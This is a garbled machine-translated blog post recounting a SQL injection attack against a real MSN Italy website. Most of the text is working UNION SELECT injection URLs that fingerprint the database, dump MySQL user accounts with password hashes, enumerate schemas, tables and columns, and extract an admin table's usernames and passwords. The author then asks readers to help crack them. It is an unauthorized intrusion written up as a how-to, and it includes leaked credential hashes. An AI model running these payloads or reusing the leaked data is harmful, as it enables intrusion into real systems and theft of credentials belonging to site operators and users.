Manually guess the website library, so that we despise Microsoft

Author: UpFonT
Reference address: http://upfont.blogbus.com/logs/37867077.html

One hour ago, Gh0u1 sent a link saying that it was a msn website and thought there were any new technical articles to share. It would be wrong if we entered it ~ We can see numbers like 1, 2, 3, 4, and 5 ~ Look at the url, it's actually an injection point ~ Scared ~, Later, I learned that he posted a website when he was visiting a foreign forum ~ Curious, let's take a look. I can't remember this ~ (Amnesia has been very bad recently ),

First, you can see the given address.

Http://benessere.it.msn.com/gallery/-1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11 --/casalinghe-perfette-10-m osse-.html

The webpage shows, and 11 ~~ You can start to use statements to first check the type of the database ~ First, I tried mysql and replaced it with concat_ws (0x3a, user (), @ version, database (). Then the complete statement is
Http://benessere.it.msn.com/gallery/-1 union select 1, concat_ws (0x3a, user (), @ version, database (), 3,4, 5, 6, 7, 8, 9, 10, 11 --/casalinghe-perfette-10-m osse-.html

The user database name mysql @ localhost: 5.0.22: progr "> mysql @ localhost: 5.0.22: progr

Actually appeared ~ Is it mysql or 5.0.22 ~ Next, let's take a look at the cross-database process ~ Statement is

Http://benessere.it.msn.com/gallery/-1 union select 1, concat_ws (0x3a, User, Password, Host), 3, 4, 5, 6, 7, 8, 9, 10, 11 + from + mysql. user --/casalinghe-perfette-10-m osse-.html

Then you can see the message that is human.
Root: 7687543e5d021f1c: localhost
Will there be other users? Then I will try it with limit.

Http://benessere.it.msn.com/gallery/-1 union select 1, concat_ws (0x3a, User, Password, Host), 3, 4, 5, 6, 7, 8, 9, 10, 11 + from + mysql. user + limit, 1, 30 --/casalinghe-perfette-10-m osse-.html

Er ~ Why?
Root: 7687543e5d021f1c: donna. sanihelp. it tests all the users in sequence as follows:

Root: 7687543e5d021f1c: localhost
Root: 7687543e5d021f1c: donna. sanihelp. it
Donnamsn: 1558b7da73ad0249: %
Mysql: 659764293f6714cc: localhost
Concorsi: 7b1df5aa33eb7d2c: localhost

Unfortunately, none of them can be broken '~ (Microsoft is not a vegetarian ~ Always have a security password ~)

Fruitless ~

Then I checked information_schema.schema in the same way and found out which databases he had.

Http://benessere.it.msn.com/gallery/-1 union select 1, SCHEMA_NAME, 3,4, 5, 6, 7, 8, 9, 10, 11 + from + information_schema.SCHEMATA + limit + --/casalinghe-perfette-10-m osse-.html

12 allnew
SLAVEFILE
Test
Alimenti
Concorsi
Contatti
Contenui
Dieta_on_line
DrAnswer
Farmaci
Gallery
Lavoro
Mailinglist
Mysql
Newsletter_msn
Nomi
Progr
Quiz
Sondaggi
Strutture
Terme
Viaggi

~ Only for learning)

Ion_schema.tables

Http://benessere.it.msn.com/gallery/-1 union select 1, concat_ws (0x3a, TABLES_NAME, TABLE_SCHEMA), 3, 4, 5, 6, 7, 8, 9, 10, 11 + from + information_schema.Tables + limit + 1, 30 --/casalinghe-perfette-10-m osse-.html

I have a problem with where ~ (Please advise Daniel ~ I am stupid)

Then we know the table name for record ~~ Then find the key

Next, COLUMNS is the table ~ The method for knowing the table field name is the same as above ~ Change it by yourself ~

Http://benessere.it.msn.com/gallery/-1 union select 1, COLUMN_NAME, 3,4, 5, 6, 7, 8, 9, 10, 11 + from + information_schema.COLUMNS + where + TABLE_NAME = char (49,50, 97,108,108, 95,97, 100,109,105,110, 95,98, 95,108,111,103) + limit + --/casalinghe-perfette-10-m osse-.html

We know

Id
User
Pass

Then ~

Http://benessere.it.msn.com/gallery/-1 union select 1, concat_ws (0x3a, user, pass), 3, 4, 5, 6, 7, 8, 9, 10, 11 + from + 12allnew. 12all_admin_ B _log + limit + 8, 30 --/casalinghe-perfette-10-m osse-.html

OK !~ We know the username and password but I dont know how to crack it ~

Who can help me ~ To crack it ~

Thats all

Thank all of you